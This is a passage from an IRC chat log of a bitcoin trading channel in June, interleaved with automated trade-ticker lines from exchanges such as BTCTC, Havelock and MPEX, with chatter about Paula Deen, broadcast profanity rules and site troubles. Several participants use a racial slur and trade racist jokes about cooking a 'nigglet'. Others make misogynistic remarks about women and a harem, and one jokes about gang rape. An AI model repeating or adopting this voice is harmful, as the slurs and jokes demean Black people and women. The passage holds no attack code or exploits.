23:52:02 going forward, it's hard to say if it'll be profitable :) Jun 24 23:52:09 well, the guy did give 100 btc to the bitbet skeptics so. Jun 24 23:52:42 why oh why didnt i take that bet Jun 24 23:52:50 [BTCTC] [TAT.ASICMINER] 45 @ 0.032903 = 1.4806 BTC [+] Jun 24 23:53:10 iirc it was like 150-110 in the end or somesuch Jun 24 23:53:19 im still baffled other people bet on yes other than the producer. Jun 24 23:53:47 [BTCTC] [ASICMINER-PT] 1 @ 3.462899 BTC [+] Jun 24 23:54:02 like you say, they wanted to be a part of bitcoin Jun 24 23:54:14 and they were willing to pay for it Jun 24 23:54:18 fandom! Jun 24 23:54:20 [HAVELOCK] [ASICM] 121 @ 0.03303008 = 3.9966 BTC [+] Jun 24 23:54:22 [HAVELOCK] [ASICM] 21 @ 0.03303 = 0.6936 BTC [-] Jun 24 23:54:23 [HAVELOCK] [ASICM] 54 @ 0.03300104 = 1.7821 BTC [-] Jun 24 23:54:24 [HAVELOCK] [ASICM] 9 @ 0.03300004 = 0.297 BTC [-] Jun 24 23:54:25 [HAVELOCK] [ASICM] 219 @ 0.03300003 = 7.227 BTC [-] Jun 24 23:54:33 totally. Jun 24 23:55:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.034197 BTC [+] Jun 24 23:55:18 freakiest form of fandom: American elections Jun 24 23:55:50 [BTCTC] [BITVPS] 19 @ 0.001457 = 0.0277 BTC [+] Jun 24 23:56:14 [BTCTC] [TAT.VIRTUALMINE] 55 @ 0.0035 = 0.1925 BTC [+] Jun 24 23:57:03 how bout NASCAR? Jun 24 23:57:32 well, at least NASCAR delivers Jun 24 23:58:58 i guess... Jun 24 23:59:29 at least drivers can die in NASCAR. politicians stay alive Jun 24 23:59:52 another point in favor of NASCAR -- it's real Jun 24 23:59:59 http://whitepeoplemadatfoodnetwork.tumblr.com/ Jun 25 00:00:26 in case you missed it Paula Deen, our diabetic fat southern tv chef, got all racist and went to court for it Jun 25 00:00:33 said dumber things Jun 25 00:00:33 [BTCTC] [ASICMINER-PT] 1 @ 3.426501 BTC [-] Jun 25 00:00:38 now here her fans Jun 25 00:02:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.033011 BTC [-] Jun 25 00:02:19 [BTCTC] [TAT.ASICMINER] 55 @ 0.03301 = 1.8156 BTC [-] Jun 25 00:02:19 [BTCTC] [ASICMINER-PT] 1 @ 3.426501 BTC [-] Jun 25 00:02:21 [BTCTC] [TAT.ASICMINER] 16 @ 0.033 = 0.528 BTC [-] Jun 25 00:03:28 [BTCTC] [ASICMINER-PT] 2 @ 3.426501 = 6.853 BTC [-] Jun 25 00:03:55 i don't get it tho. Jun 25 00:04:02 who the fuck fires anyone because they said nigger. Jun 25 00:04:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.195 BTC [-] Jun 25 00:04:55 who the fuck fires a politician for tweeting his boner Jun 25 00:05:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.053963 BTC [-] Jun 25 00:05:31 well that's different. politicians have no riughts. Jun 25 00:05:36 [BTCTC] [BTC-BOND] 98 @ 0.0099 = 0.9702 BTC [-] Jun 25 00:05:38 i'd fire them for not having their shoelaces tied right. Jun 25 00:06:21 nobody forces you to run for office, you wanna be a politician you gotta wear a fucking curly wig. Jun 25 00:06:23 in the summer. Jun 25 00:06:24 [BTCTC] [DMS.MINING] 4 @ 0.0164 = 0.0656 BTC [+] Jun 25 00:06:39 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Jun 25 00:06:42 the answer is simple, Food Network is a business and being racist isn't profitable Jun 25 00:06:50 so firing your like only star is ? Jun 25 00:07:02 most likely Jun 25 00:07:03 that's what i don't get. are they trying to wiggle out of some too lucrative for her contract ? Jun 25 00:07:14 controversy sells Jun 25 00:07:19 [BTCTC] [DMS.SELLING] 1 @ 0.039396 BTC [+] Jun 25 00:07:21 they'll probably hire her back next week Jun 25 00:07:22 cause otherwise i don't see it. who fires stern for saying whatever Jun 25 00:07:38 interesting point Jun 25 00:07:43 someone who wants to keep their broadcasting license Jun 25 00:07:46 stern gets paid for it Jun 25 00:07:51 deen gets fired for it Jun 25 00:07:51 what if she says something really gross. Jun 25 00:08:04 io mean that i could see, she got fired for saying "shit piss cooking hell" on food tv Jun 25 00:08:25 shit, piss, fuck, cunt, cocksucker, motherfucker, and tits Jun 25 00:08:35 aknap3 they need a license now ?! Jun 25 00:08:36 how did tits make it on that list? Jun 25 00:08:41 mp: not anymore Jun 25 00:08:42 he said the 7 Jun 25 00:08:44 exactly. Jun 25 00:08:47 maybe deen can go work for xm radio Jun 25 00:08:56 her first show ? Jun 25 00:09:00 [BTCTC] [ASICMINER-PT] 2 @ 3.4265 = 6.853 BTC [-] Jun 25 00:09:00 how to cook suckling nigglet. Jun 25 00:09:02 [BTCTC] [ASICMINER-PT] 2 @ 3.426 = 6.852 BTC [-] Jun 25 00:09:03 [BTCTC] [ASICMINER-PT] 1 @ 3.415 BTC [-] Jun 25 00:09:15 suckling niglet sounds like dark meat Jun 25 00:09:25 probably needs a lot of pounding Jun 25 00:09:31 hurrrr Jun 25 00:10:11 but the n word... that's not even on the list... is that because it's so censored you can't put it on a list? Jun 25 00:11:11 the list was made before it became taboo? Jun 25 00:12:10 Y'know what's interesting is reading the adventures of Tom Sawyer out loud, and realizing that you once read that in school Jun 25 00:12:27 the list is like 30 years old ya Jun 25 00:12:39 [BTCTC] [ASICMINER-PT] 1 @ 3.462098 BTC [+] Jun 25 00:13:06 back then people mostly had jobs and skills and they didn't care what the permaconcerned had to say Jun 25 00:14:38 [BTCTC] [DMS.MINING] 4 @ 0.0164 = 0.0656 BTC [+] Jun 25 00:14:40 [BTCTC] [DMS.MINING] 30 @ 0.0164 = 0.492 BTC [+] Jun 25 00:14:41 [BTCTC] [DMS.MINING] 17 @ 0.0168 = 0.2856 BTC [+] Jun 25 00:14:42 [BTCTC] [DMS.MINING] 136 @ 0.01699 = 2.3106 BTC [+] Jun 25 00:14:43 [BTCTC] [DMS.MINING] 10 @ 0.017044 = 0.1704 BTC [+] Jun 25 00:14:45 [BTCTC] [DMS.MINING] 2 @ 0.017467 = 0.0349 BTC [+] Jun 25 00:14:46 [BTCTC] [DMS.MINING] 140 @ 0.017468 = 2.4455 BTC [+] Jun 25 00:16:45 [BTCTC] [ASICMINER-PT] 1 @ 3.411001 BTC [-] Jun 25 00:16:47 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [-] Jun 25 00:16:49 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Jun 25 00:17:19 [HAVELOCK] [ASICM] 1 @ 0.0337644 BTC [+] Jun 25 00:17:21 [BTCTC] [ASICMINER-PT] 1 @ 3.3901 BTC [-] Jun 25 00:17:44 [BTCTC] [ASICMINER-PT] 3 @ 3.39 = 10.17 BTC [-] Jun 25 00:20:49 [BTCTC] [ASICMINER-PT] 2 @ 3.387 = 6.774 BTC [-] Jun 25 00:20:51 [BTCTC] [ASICMINER-PT] 12 @ 3.386 = 40.632 BTC [-] Jun 25 00:21:52 [BTCTC] [ASICMINER-PT] 3 @ 3.386 = 10.158 BTC [-] Jun 25 00:22:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.034076 = 0.2045 BTC [+] Jun 25 00:22:52 [BTCTC] [DMS.MINING] 1 @ 0.017468 BTC [+] Jun 25 00:24:09 [BTCTC] [DMS.MINING] 21 @ 0.017468 = 0.3668 BTC [+] Jun 25 00:24:16 [BTCTC] [DMS.MINING] 10 @ 0.018041 = 0.1804 BTC [+] Jun 25 00:24:28 [BTCTC] [ASICMINER-PT] 1 @ 3.439699 BTC [+] Jun 25 00:25:47 [BTCTC] [DMS.PURCHASE] 4 @ 0.053963 = 0.2159 BTC [-] Jun 25 00:29:00 they teach american kids to read now? Jun 25 00:29:05 what's with bitcoin-otc.com these days, seems to be quite flaky Jun 25 00:29:38 someone said it's ddossed Jun 25 00:30:23 dub: not sure what happens to the masses over there, but some do get an education Jun 25 00:30:39 when I was there they had us colour in pictures Jun 25 00:31:10 needed tutoring to get back to speed when I got home Jun 25 00:32:30 I think home is where most people learn stuff anyway Jun 25 00:32:40 [BTCTC] [TAT.ASICMINER] 66 @ 0.034053 = 2.2475 BTC [-] Jun 25 00:32:46 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [-] Jun 25 00:33:13 I mean back home to a civilised country Jun 25 00:33:13 ^^ bit early to be executing options Jun 25 00:33:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.034053 BTC [-] Jun 25 00:33:27 [BTCTC] [ASICMINER-PT] 1 @ 3.439599 BTC [+] Jun 25 00:34:07 dub: I know -- just that I think it likely holds true in many places that school is not where you learn the important stuff Jun 25 00:36:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.034053 = 0.0681 BTC [-] Jun 25 00:39:23 aknap3: school is where you learn to fuck with the system Jun 25 00:40:16 [BTCTC] [BITVPS] 35 @ 0.001457 = 0.051 BTC [+] Jun 25 00:41:56 [BTCTC] [TAT.ASICMINER] 31 @ 0.034053 = 1.0556 BTC [-] Jun 25 00:43:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.033332 = 0.1 BTC [-] Jun 25 00:43:37 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Jun 25 00:45:10 [BTCTC] [RSM] 10 @ 0.021001 = 0.21 BTC [-] Jun 25 00:45:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.033334 = 0.0667 BTC [+] Jun 25 00:45:35 [BTCTC] [RSM] 25 @ 0.021 = 0.525 BTC [-] Jun 25 00:45:52 [BTCTC] [RSM] 11 @ 0.0201 = 0.2211 BTC [-] Jun 25 00:46:59 [HAVELOCK] [ASICM] 200 @ 0.03303 = 6.606 BTC [-] Jun 25 00:47:01 [HAVELOCK] [ASICM] 2 @ 0.03300004 = 0.066 BTC [-] Jun 25 00:47:02 [HAVELOCK] [ASICM] 1 @ 0.03300004 BTC [-] Jun 25 00:47:03 [HAVELOCK] [ASICM] 54 @ 0.03300003 = 1.782 BTC [-] Jun 25 00:47:03 [HAVELOCK] [ASICM] 95 @ 0.033 = 3.135 BTC [-] Jun 25 00:47:46 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003794 = 0.1897 BTC [+] Jun 25 00:47:48 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.003795 = 0.5693 BTC [+] Jun 25 00:49:22 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.0033 = 0.1089 BTC [-] Jun 25 00:54:22 [HAVELOCK] [ASICM] 100 @ 0.0322 = 3.22 BTC [-] Jun 25 00:54:23 [HAVELOCK] [ASICM] 2 @ 0.0321 = 0.0642 BTC [-] Jun 25 00:54:25 [HAVELOCK] [ASICM] 105 @ 0.0321 = 3.3705 BTC [-] Jun 25 00:54:26 [HAVELOCK] [ASICM] 266 @ 0.032 = 8.512 BTC [-] Jun 25 00:54:27 [HAVELOCK] [ASICM] 100 @ 0.032 = 3.2 BTC [-] Jun 25 00:54:28 [HAVELOCK] [ASICM] 826 @ 0.03199999 = 26.432 BTC [-] Jun 25 00:54:29 [HAVELOCK] [ASICM] 165 @ 0.03193 = 5.2685 BTC [-] Jun 25 00:55:46 [BTCTC] [BASIC-MINING] 3 @ 1.21 = 3.63 BTC [-] Jun 25 01:01:26 [BTCTC] [DMS.MINING] 2 @ 0.018699 = 0.0374 BTC [+] Jun 25 01:13:57 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Jun 25 01:21:06 [BTCTC] [BITVPS] 46 @ 0.001457 = 0.067 BTC [+] Jun 25 01:24:21 [BTCTC] [BITVPS] 186 @ 0.001458 = 0.2712 BTC [+] Jun 25 01:24:34 [HAVELOCK] [SDICE] 1 @ 0.195 BTC [-] Jun 25 01:26:14 [BTCTC] [B.YABMC] 42 @ 0.004 = 0.168 BTC [-] Jun 25 01:27:43 [BTCTC] [DMS.PURCHASE] 66 @ 0.053963 = 3.5616 BTC [-] Jun 25 01:31:45 [BTCTC] [TAT.ASICMINER] 26 @ 0.033604 = 0.8737 BTC [+] Jun 25 01:32:13 [BTCTC] [TAT.ASICMINER] 44 @ 0.033603 = 1.4785 BTC [-] Jun 25 01:33:09 [BTCTC] [TAT.ASICMINER] 30 @ 0.0336 = 1.008 BTC [-] Jun 25 01:33:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.033344 BTC [-] Jun 25 01:33:58 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Jun 25 01:40:31 [HAVELOCK] [ASICM] 15 @ 0.032999 = 0.495 BTC [+] Jun 25 01:43:59 [MPEX] [S.MPOE] 6238 @ 0.00078664 = 4.9071 BTC [+] Jun 25 01:51:18 [BTCTC] [DMS.MINING] 5 @ 0.017489 = 0.0874 BTC [-] Jun 25 01:51:20 [BTCTC] [DMS.MINING] 4 @ 0.017488 = 0.07 BTC [-] Jun 25 02:00:46 mircea_popescu: no... no trouble ? Jun 25 02:00:56 oh i see. its a diff investigation Jun 25 02:01:00 a Jun 25 02:01:12 hes trying to help with some ppl who reused their account info on multiple sutes Jun 25 02:01:38 not too long from now, bitfunder will be the very opposite of possibly in trouble. ;) Jun 25 02:04:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.033964 = 0.1359 BTC [+] Jun 25 02:04:40 possibly not in trouble? Jun 25 02:04:42 ;) Jun 25 02:04:49 sounds worse! Jun 25 02:06:05 [MPEX] [S.MPOE] 8982 @ 0.00078715 = 7.0702 BTC [+] Jun 25 02:08:38 reused their info on multiple sites as in, made accounts on more than 1 site ? Jun 25 02:09:14 probably gave them all the same name, too.. tsk tsk Jun 25 02:09:37 Ukto: what is going on? Jun 25 02:09:42 what trouble are you causing? Jun 25 02:11:51 [BTCTC] [LTC-MINING] 1 @ 0.3879 BTC [-] Jun 25 02:12:17 https://www.youtube.com/watch?v=9D7t92e02oA Jun 25 02:12:19 Trouble Ad (1995) - YouTube Jun 25 02:12:41 stop that dub Jun 25 02:12:52 stop what Jun 25 02:12:57 stop the wub wub Jun 25 02:12:59 NO WUB WUB Jun 25 02:13:09 thats an official buttfunder board meeting Jun 25 02:13:21 oh my Jun 25 02:13:24 you don't say? Jun 25 02:17:10 thestringpuller: i am not causing anything :P Jun 25 02:17:15 its al mircea_popescu's fault ;) Jun 25 02:18:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.033949 = 0.1697 BTC [-] Jun 25 02:27:21 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003404 = 0.1702 BTC [+] Jun 25 02:27:37 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003403 = 0.1702 BTC [-] Jun 25 02:28:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.033939 = 0.3394 BTC [-] Jun 25 02:30:38 mircea_popescu is always rousin' up trouble Jun 25 02:30:52 ye 'olde troublemaker! Jun 25 02:33:02 [BTCTC] [RSM] 22 @ 0.02 = 0.44 BTC [-] Jun 25 02:35:37 [BTCTC] [ASICMINER-PT] 1 @ 3.388509 BTC [-] Jun 25 02:36:52 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [+] Jun 25 02:39:42 ;;bc,24hprc Jun 25 02:39:47 really gribble Jun 25 02:41:44 http://trilema.com/2013/perfect-money-corrupts-absolutely/ Jun 25 02:41:47 Perfect money corrupts absolutely pe Trilema - Un blog de Mircea Popescu. Jun 25 02:41:52 for all teh peeps missing out the just-dice chat fun Jun 25 02:46:04 [HAVELOCK] [KCIM] 3 @ 1.01211 = 3.0363 BTC [-] Jun 25 02:47:46 [HAVELOCK] [HIM] 7 @ 0.266 = 1.862 BTC [+] Jun 25 02:48:24 [HAVELOCK] [HIM] 5 @ 0.265 = 1.325 BTC [-] Jun 25 02:50:31 [HAVELOCK] [HIM] 1 @ 0.25001 BTC [-] Jun 25 02:50:32 [HAVELOCK] [HIM] 1 @ 0.24101 BTC [-] Jun 25 02:50:34 [HAVELOCK] [HIM] 3 @ 0.234001 = 0.702 BTC [-] Jun 25 02:50:35 [HAVELOCK] [HIM] 20 @ 0.231 = 4.62 BTC [-] Jun 25 02:50:36 [HAVELOCK] [HIM] 10 @ 0.23 = 2.3 BTC [-] Jun 25 02:51:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.0339 = 0.1017 BTC [-] Jun 25 02:51:32 [BTCTC] [COGNITIVE] 1 @ 0.308699 BTC [+] Jun 25 02:51:34 [BTCTC] [COGNITIVE] 4 @ 0.309 = 1.236 BTC [+] Jun 25 02:51:34 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [+] Jun 25 02:51:35 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [+] Jun 25 02:51:37 [BTCTC] [COGNITIVE] 1 @ 0.329499 BTC [+] Jun 25 02:53:37 [BTCTC] [BITVPS] 16 @ 0.001458 = 0.0233 BTC [+] Jun 25 02:54:25 [BTCTC] [TAT.ASICMINER] 13 @ 0.0334 = 0.4342 BTC [-] Jun 25 02:55:16 mircea_popescu: TL;DR did she get her tits out? Jun 25 02:55:29 nope. Jun 25 02:55:38 but she wants to do all nude. Jun 25 02:55:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.033998 BTC [+] Jun 25 02:56:31 [BTCTC] [PAJKA.BOND] 2 @ 0.048576 = 0.0972 BTC [-] Jun 25 02:56:33 [BTCTC] [PAJKA.BOND] 21 @ 0.0485 = 1.0185 BTC [-] Jun 25 02:57:16 [BTCTC] [DMS.MINING] 5 @ 0.018626 = 0.0931 BTC [+] Jun 25 02:57:41 [BTCTC] [DMS.MINING] 8 @ 0.01863 = 0.149 BTC [+] Jun 25 02:57:53 [BTCTC] [DMS.MINING] 10 @ 0.0187 = 0.187 BTC [+] Jun 25 02:58:05 [BTCTC] [DMS.MINING] 11 @ 0.019 = 0.209 BTC [+] Jun 25 02:58:11 typical female Jun 25 02:58:12 if you get her to move to .ro and join your harem I'll give you .1 Jun 25 02:58:36 [BTCTC] [DMS.MINING] 2 @ 0.01998 = 0.04 BTC [+] Jun 25 02:58:37 [BTCTC] [DMS.MINING] 22 @ 0.01999 = 0.4398 BTC [+] Jun 25 02:59:27 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [-] Jun 25 02:59:56 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [-] Jun 25 03:00:22 ;;10 Jun 25 03:00:24 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [-] Jun 25 03:00:55 [BTCTC] [COGNITIVE] 1 @ 0.29 BTC [-] Jun 25 03:01:02 [BTCTC] [COGNITIVE] 1 @ 0.329498 BTC [+] Jun 25 03:01:04 [BTCTC] [COGNITIVE] 7 @ 0.329499 = 2.3065 BTC [+] Jun 25 03:01:13 [BTCTC] [COGNITIVE] 1 @ 0.284 BTC [-] Jun 25 03:01:41 [BTCTC] [COGNITIVE] 2 @ 0.28 = 0.56 BTC [-] Jun 25 03:01:43 [BTCTC] [COGNITIVE] 316 @ 0.28 = 88.48 BTC [-] Jun 25 03:01:53 [BTCTC] [PAJKA.BOND] 4 @ 0.05 = 0.2 BTC [+] Jun 25 03:02:35 [BTCTC] [COGNITIVE] 4 @ 0.28 = 1.12 BTC [-] Jun 25 03:03:29 dub i don't take teens. Jun 25 03:09:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.033982 = 0.1359 BTC [-] Jun 25 03:10:14 too old? Jun 25 03:11:55 lol. Jun 25 03:12:00 no, just, it's a harem not a highschool. Jun 25 03:18:21 you're weird Jun 25 03:27:41 [MPEX] [S.MPOE] 3768 @ 0.00078715 = 2.966 BTC [+] Jun 25 03:27:55 [MPEX] [S.MPOE] 4032 @ 0.00078791 = 3.1769 BTC [+] Jun 25 03:30:49 [HAVELOCK] [KCIM] 1 @ 1.029999 BTC [+] Jun 25 03:32:13 [HAVELOCK] [SDICE] 2 @ 0.195 = 0.39 BTC [-] Jun 25 03:32:20 [HAVELOCK] [SDICE] 1 @ 0.19499 BTC [-] Jun 25 03:43:40 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.003404 = 0.0919 BTC [+] Jun 25 03:50:20 [BTCTC] [TAT.ASICMINER] 7 @ 0.033939 = 0.2376 BTC [-] Jun 25 03:50:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.033952 = 0.2377 BTC [+] Jun 25 03:58:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.033987 = 0.6797 BTC [+] Jun 25 03:59:27 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [+] Jun 25 03:59:29 [BTCTC] [ASICMINER-PT] 1 @ 3.387 BTC [-] Jun 25 03:59:29 [BTCTC] [ASICMINER-PT] 10 @ 3.386 = 33.86 BTC [-] Jun 25 04:00:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.033611 = 0.6722 BTC [-] Jun 25 04:00:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.033612 = 0.3361 BTC [+] Jun 25 04:02:15 [BTCTC] [DMS.PURCHASE] 85 @ 0.053963 = 4.5869 BTC [-] Jun 25 04:02:47 [BTCTC] [DMS.SELLING] 50 @ 0.038 = 1.9 BTC [-] Jun 25 04:03:28 [BTCTC] [DMS.PURCHASE] 30 @ 0.053963 = 1.6189 BTC [-] Jun 25 04:06:37 ;;seen mircea_popescu Jun 25 04:06:42 mircea_popescu: where you at? Jun 25 04:06:51 dude you keep doing this Jun 25 04:06:53 sup ? Jun 25 04:07:11 Cause I like testing your responsiveness as a bitcoin super CEO Jun 25 04:07:56 Many people complain about inaccessibility to "customer support" but you provide it sometimes up to 12 hours a day... Jun 25 04:08:13 [BTCTC] [ASICMINER-PT] 1 @ 3.449987 BTC [+] Jun 25 04:08:20 Is it wrong for me to think it so cool? :P Jun 25 04:08:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.033973 = 0.1019 BTC [+] Jun 25 04:09:03 [HAVELOCK] [ASICM] 39 @ 0.032999 = 1.287 BTC [+] Jun 25 04:09:38 [HAVELOCK] [ASICM] 38 @ 0.033 = 1.254 BTC [+] Jun 25 04:09:53 [HAVELOCK] [ASICM] 1 @ 0.033 BTC [+] Jun 25 04:11:21 lol Jun 25 04:11:25 yes. Jun 25 04:11:34 you know what happened to the little boy that cried wolf ? Jun 25 04:12:13 he shot the wolf in the face with a shot gun? Jun 25 04:12:19 that's at least how my parents told it to me Jun 25 04:12:28 cause the wolf was actually a warefolf Jun 25 04:12:45 and the boy figured out to use silver shotgun scatter etc. Jun 25 04:12:50 no, he just got gangraped by some hobos. Jun 25 04:13:31 [BTCTC] [DMS.MINING] 5 @ 0.017703 = 0.0885 BTC [-] Jun 25 04:13:40 [BTCTC] [DMS.MINING] 20 @ 0.017702 = 0.354 BTC [-] Jun 25 04:13:51 [BTCTC] [DMS.MINING] 8 @ 0.0177 = 0.1416 BTC [-] Jun 25 04:14:15 [BTCTC] [DMS.SELLING] 17 @ 0.037001 = 0.629 BTC [-] Jun 25 04:14:28 [BTCTC] [DMS.SELLING] 20 @ 0.037 = 0.74 BTC [-] Jun 25 04:14:50 [BTCTC] [S.DICE-PT] 100 @ 0.002303 = 0.2303 BTC [-] Jun 25 04:14:52 [BTCTC] [S.DICE-PT] 77 @ 0.002302 = 0.1773 BTC [-] Jun 25 04:14:53 [BTCTC] [S.DICE-PT] 33 @ 0.0023 = 0.0759 BTC [-] Jun 25 04:14:54 [BTCTC] [S.DICE-PT] 50 @ 0.00225 = 0.1125 BTC [-] Jun 25 04:14:56 [BTCTC] [S.DICE-PT] 150 @ 0.00221 = 0.3315 BTC [-] Jun 25 04:14:57 [BTCTC] [S.DICE-PT] 23 @ 0.0022 = 0.0506 BTC [-] Jun 25 04:14:58 [BTCTC] [S.DICE-PT] 1 @ 0.0022 BTC [-] Jun 25 04:15:00 [BTCTC] [S.DICE-PT] 25 @ 0.00215 = 0.0538 BTC [-] Jun 25 04:15:01 [BTCTC] [S.DICE-PT] 300 @ 0.00211 = 0.633 BTC [-] Jun 25 04:15:01 [BTCTC] [S.DICE-PT] 100 @ 0.0021 = 0.21 BTC [-] Jun 25 04:15:02 [BTCTC] [S.DICE-PT] 100 @ 0.00205 = 0.205 BTC [-] Jun 25 04:15:03 [BTCTC] [S.DICE-PT] 1 @ 0.00204 BTC [-] Jun 25 04:15:04 [BTCTC] [S.DICE-PT] 2000 @ 0.002035 = 4.07 BTC [-] Jun 25 04:15:05 [BTCTC] [S.DICE-PT] 100 @ 0.002035 = 0.2035 BTC [-] Jun 25 04:15:07 [BTCTC] [S.DICE-PT] 200 @ 0.00203 = 0.406 BTC [-] Jun 25 04:15:08 [BTCTC] [S.DICE-PT] 50 @ 0.002 = 0.1 BTC [-] Jun 25 04:15:54 [BTCTC] [DMS.PURCHASE] 41 @ 0.053963 = 2.2125 BTC [-] Jun 25 04:16:08 [BTCTC] [ASICMINER-PT] 1 @ 3.44999 BTC [+] Jun 25 04:16:15 [BTCTC] [GSDPT] 9 @ 0.0023 = 0.0207 BTC [-] Jun 25 04:17:22 [BTCTC] [DMS.MINING] 150 @ 0.017468 = 2.6202 BTC [-] Jun 25 04:19:17 ;;ticker Jun 25 04:20:56 gribble is down I think Jun 25 04:27:26 [BTCTC] [DMS.SELLING] 20 @ 0.0363 = 0.726 BTC [-] Jun 25 04:27:28 [BTCTC] [DMS.SELLING] 2 @ 0.036117 = 0.0722 BTC [-] Jun 25 04:27:28 [BTCTC] [DMS.SELLING] 50 @ 0.036 = 1.8 BTC [-] Jun 25 04:27:30 [BTCTC] [DMS.SELLING] 10 @ 0.036 = 0.36 BTC [-] Jun 25 04:27:31 [BTCTC] [DMS.SELLING] 10 @ 0.036 = 0.36 BTC [-] Jun 25 04:27:56 [BTCTC] [DMS.PURCHASE] 110 @ 0.053963 = 5.9359 BTC [-] Jun 25 04:34:47 [HAVELOCK] [HIM] 3 @ 0.231 = 0.693 BTC [+] Jun 25 04:38:28 [BTCTC] [S.DICE-PT] 6 @ 0.002519 = 0.0151 BTC [+] Jun 25 04:39:39 [HAVELOCK] [SDICE] 3 @ 0.199999 = 0.6 BTC [+] Jun 25 04:41:15 U.O.E.N.O Jun 25 04:41:47 [BTCTC] [DMS.MINING] 8 @ 0.017999 = 0.144 BTC [+] Jun 25 04:43:50 wat Jun 25 04:48:18 [BTCTC] [DMS.MINING] 2 @ 0.017469 = 0.0349 BTC [-] Jun 25 04:48:20 [BTCTC] [DMS.MINING] 64 @ 0.017468 = 1.118 BTC [-] Jun 25 04:59:19 [HAVELOCK] [ASICM] 10 @ 0.033 = 0.33 BTC [+] Jun 25 05:07:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.033614 BTC [-] Jun 25 05:08:26 [HAVELOCK] [ASICM] 24 @ 0.03299 = 0.7918 BTC [-] Jun 25 05:09:53 [BTCTC] [DMS.MINING] 110 @ 0.017468 = 1.9215 BTC [-] Jun 25 05:14:08 [HAVELOCK] [ASICM] 1 @ 0.03299 BTC [-] Jun 25 05:14:10 [HAVELOCK] [ASICM] 100 @ 0.03299999 = 3.3 BTC [+] Jun 25 05:14:11 [HAVELOCK] [ASICM] 99 @ 0.033 = 3.267 BTC [+] Jun 25 05:14:31 [HAVELOCK] [ASICM] 100 @ 0.033 = 3.3 BTC [+] Jun 25 05:16:28 [BTCTC] [DMS.SELLING] 32 @ 0.035803 = 1.1457 BTC [-] Jun 25 05:16:30 [BTCTC] [DMS.SELLING] 60 @ 0.035802 = 2.1481 BTC [-] Jun 25 05:17:09 [BTCTC] [DMS.PURCHASE] 100 @ 0.053963 = 5.3963 BTC [-] Jun 25 05:22:49 [BTCTC] [DMS.MINING] 1 @ 0.01798 BTC [+] Jun 25 05:25:35 [BTCTC] [DMS.MINING] 1 @ 0.017469 BTC [-] Jun 25 05:25:36 [BTCTC] [DMS.MINING] 99 @ 0.017468 = 1.7293 BTC [-] Jun 25 05:26:02 [HAVELOCK] [ASICM] 1 @ 0.03299 BTC [-] Jun 25 05:26:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.033977 = 0.1699 BTC [+] Jun 25 05:29:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.034 = 0.102 BTC [+] Jun 25 05:30:33 [BTCTC] [ASICMINER-PT] 1 @ 3.400021 BTC [-] Jun 25 05:34:44 [BTCTC] [ASICMINER-PT] 1 @ 3.40002 BTC [-] Jun 25 05:34:54 [BTCTC] [S.MPOE-PT] 2 @ 0.00078 = 0.0016 BTC [+] Jun 25 05:35:46 [MPEX] [S.MPOE] 1124 @ 0.00078791 = 0.8856 BTC [+] Jun 25 05:35:53 [MPEX] [S.MPOE] 3526 @ 0.00078825 = 2.7794 BTC [+] Jun 25 05:36:19 [BTCTC] [BASIC-MINING] 1 @ 1.34 BTC [+] Jun 25 05:36:42 [BTCTC] [ASICMINER-PT] 1 @ 3.4396 BTC [+] Jun 25 05:38:31 [BTCTC] [BASIC-MINING] 2 @ 1.34 = 2.68 BTC [+] Jun 25 05:38:33 [BTCTC] [BASIC-MINING] 1 @ 1.341416 BTC [+] Jun 25 05:38:35 [BTCTC] [BASIC-MINING] 2 @ 1.35 = 2.7 BTC [+] Jun 25 05:38:55 [BTCTC] [BASIC-MINING] 1 @ 1.35 BTC [+] Jun 25 05:41:57 [BTCTC] [BASIC-MINING] 1 @ 1.3999 BTC [+] Jun 25 05:41:58 [BTCTC] [BASIC-MINING] 3 @ 1.4 = 4.2 BTC [+] Jun 25 05:41:59 [BTCTC] [BASIC-MINING] 1 @ 1.4 BTC [+] Jun 25 05:42:00 [BTCTC] [BASIC-MINING] 1 @ 1.43 BTC [+] Jun 25 05:45:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [+] Jun 25 05:47:43 [BTCTC] [BASIC-MINING] 2 @ 1.43 = 